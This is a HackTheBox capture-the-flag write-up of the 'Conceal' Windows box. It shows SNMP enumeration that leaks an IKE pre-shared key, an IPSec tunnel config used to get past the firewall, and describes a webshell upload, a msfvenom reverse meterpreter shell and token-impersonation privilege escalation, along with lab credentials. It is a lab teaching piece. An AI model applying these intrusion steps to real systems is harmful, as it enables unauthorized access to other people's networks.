Conceal - HackTheBox Writeup

Tudor Gheorghiu — Sun, 18 Oct 2020 17:57:47 +0000

HTB Conceal Box Write-up

Conceal was a hard box when it comes to Initial Enumeration and the firewall, but after that, the user part was pretty straightforward (shell was a little tricky since it's a Windows box). Root wasn't hard at all, but you had to fiddle around a little to make the exploit work.

Initial Enumeration

I started the initial enum for this box with the usual nmap scan, but it was really slow. This usually means there is a firewall, so I couldn't do an nmap scan. Instead, I used masscan, which is much faster since it sends async requests and handles responses, to see what ports we have access to outside the firewall. You can read more about masscan here

root@fast:/home/roacker# masscan -p 1-65535,U:1-65535 --rate=1000 10.10.10.116 -e tun0

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2019-02-13 16:37:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.116

So port 161/udp is open. Let's run a nmap service scan on it:

root@fast:/home/roacker# nmap -Pn -sV -sU -p 161 10.10.10.116

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-13 10:39 CST
Nmap scan report for 10.10.10.116
Host is up.

PORT  STATE SERVICE VERSION
161/udp open snmp  SNMPv1 server (public)
Service Info: Host: Conceal

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds

Great! It's SNMP. Let's enumerate this service. I will use snmpwalk with the snmp-mibs plugin installed, which will make the output more human readable. Let's see what data we can obtain through SNMP:

root@fast:/home/roacker# snmpwalk -mALL -c public -v 2c 10.10.10.116

The output is huge, so I am only going to select what I think is interesting:

SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (3147631) 8:44:36.31
SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
SNMPv2-MIB::sysName.0 = STRING: Conceal
SNMPv2-MIB::sysLocation.0 = STRING:

TCP-MIB::tcpConnState.0.0.0.0.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.135.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.445.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49664.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49665.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49666.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49667.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49668.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49669.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49670.0.0.0.0.0 = INTEGER: listen(2)

HOST-RESOURCES-MIB::hrDeviceDescr.7 = STRING: WAN Miniport (IKEv2)
HOST-RESOURCES-MIB::hrDeviceDescr.8 = STRING: WAN Miniport (PPTP)
HOST-RESOURCES-MIB::hrDeviceDescr.9 = STRING: Microsoft Kernel Debug Network Adapter
HOST-RESOURCES-MIB::hrDeviceDescr.10 = STRING: WAN Miniport (L2TP)
HOST-RESOURCES-MIB::hrDeviceDescr.11 = STRING: Teredo Tunneling Pseudo-Interface
HOST-RESOURCES-MIB::hrDeviceDescr.12 = STRING: WAN Miniport (IP)
HOST-RESOURCES-MIB::hrDeviceDescr.13 = STRING: WAN Miniport (SSTP)
HOST-RESOURCES-MIB::hrDeviceDescr.14 = STRING: WAN Miniport (IPv6)
HOST-RESOURCES-MIB::hrDeviceDescr.15 = STRING: Intel(R) 82574L Gigabit Network Connection
HOST-RESOURCES-MIB::hrDeviceDescr.16 = STRING: WAN Miniport (PPPOE)
HOST-RESOURCES-MIB::hrDeviceDescr.17 = STRING: WAN Miniport (Network Monitor)

We leaked a list of listening services which will help us after we successfully bypass the firewall. I noticed there is an IPSec service running and we also have the IKE Pre-Shared Key which is hashed. We can easily crack that with CrackStation:

We now have the preshared key: Dudecake1!

Enumerating with another tool called snmpenum can give us some other cool results:

----------------------------------------
    LISTENING TCP PORTS
----------------------------------------

21
80
135
445
49664
49665
49666
49667
49668
49669
49670

----------------------------------------
    USERS
----------------------------------------

Guest
Destitute
Administrator
DefaultAccount

Great! We also leaked a user: Destitute

We know how to bypass the firewall. I will establish an IPSec VPN tunnel and we will be able to access the other services behind the firewall. Let's get to work!

Bypassing Firewall

This was the hardest part of the box. Getting the config file correct in order to successfully connect is not as easy as you may think. It took me 2 days to get the config file correct.

First we will need an IPSec client on our ubuntu machine. We can use StrongSwan which is the updated and maintained fork of OpenSwan. You can install it with the following command:

apt-get install strongswan

We have everything we need for the IPSec (our Ip: 10.10.13.11 | VPN IP: 10.10.10.116 | PSK: Dudecake1!) tunnel except the IKE phases which we can retrieve fairly easily:

root@fast:/home/roacker# ike-scan 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116  Main Mode Handshake returned HDR=(CKY-R=838e57d6429c37d2) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8) VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T) VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n) VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation) VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable) VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.070 seconds (14.20 hosts/sec). 1 returned handshake; 0 returned notify

So the phase is going to be 3des-sha1-modp1024. let's build our ipsec.conf file (in /etc/ipsec.conf):

config setup
 charondebug="all"

conn conceal
 keyexchange=ikev1
 ike=3des-sha1-modp1024
 esp=3des-sha1
 leftid=Destitute
 left=10.10.13.11
 leftsubnet=10.10.13.0/24
 leftauth=psk
 rightid=%any
 right=10.10.10.116
 rightsubnet=10.10.10.116[tcp/%any]
 rightauth=psk
 auto=add
 type=transport
 fragmentation=yes
 keyingtries=1

include /var/lib/strongswan/ipsec.conf.inc

We can now build our ipsec.secrets file (/etc/ipsec.secrets) using the username we leaked from the initial SNMP scan (Destitute):

# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

# this file is managed with debconf and will contain the automatically created private key
#include /var/lib/strongswan/ipsec.secrets.inc
#
Destitute %any : PSK Dudecake1!

Now for the moment of truth: we are going to connect to the VPN:

root@fast:~/conceal# systemctl start ipsec.service
root@fast:~/conceal# ipsec up conceal
initiating Main Mode IKE_SA conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (76 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA conceal[1] established between 10.10.13.11[Destitute]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10019s
maximum IKE_SA lifetime 10559s
generating QUICK_MODE request 2689023240 [ HASH SA No ID ID ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (188 bytes)
parsed QUICK_MODE response 2689023240 [ HASH SA No ID ID ]
CHILD_SA conceal{1} established with SPIs cdb43748_i e05fc992_o and TS 10.10.13.11/32 === 10.10.10.116/32[tcp]
connection 'conceal' established successfully

We are now connected. We can also access internal services like the IIS on port 80 or the ftp server (which allows anonymous login) on port 21:

User

This is now pretty straightforward. We will just need to upload an asp shell to the IIS server and get reverse access. We should use meterpreter since we will need it for root.

Running dirbuster on port 80 will reveal an Upload directory:

After doing some recon I figured out that everything we upload to the ftp server will be inside of /upload, so let's upload an webshell (I will use one I found on github but you can use whatever you like, RCE is all that matters):

We have user!

Root

Before we do anything, we should use msfvenom to create a proper reverse tcp meterpreter shell and execute it from the webshell:

We execute it and get a reverse meterpreter shell:

Here, I tried using meterpreter's getsystem autopwn, but it didn't work. This is where I made a mistake: I thought that normal exploits wouldn't work, and I would need to find a special way to privesc, meaning I skipped my normal enumeration. This set me off in the wrong direction.

After not finding anything useful, I decided to enumerate more. I executed whoami /priv in order to see my privileges. I can impersonate tokens. Bingo!

This is where I got stuck again. I tried using Hot Potato and different variations of it in order to steal an NT AUTHORITY token and use it to spawn a root shell, but none of the potato exploits worked. I was looking at JuicyPotato's repository when I found out they had a massive DB of CLSIDs. I got one of them so I can do the impersonation manually. I then generated another msfvenom virus that spawns a reverse shell on a different port, and then I impersonated that token in order to spawn the shell:

Let's take a look at the meterpreter shell I got: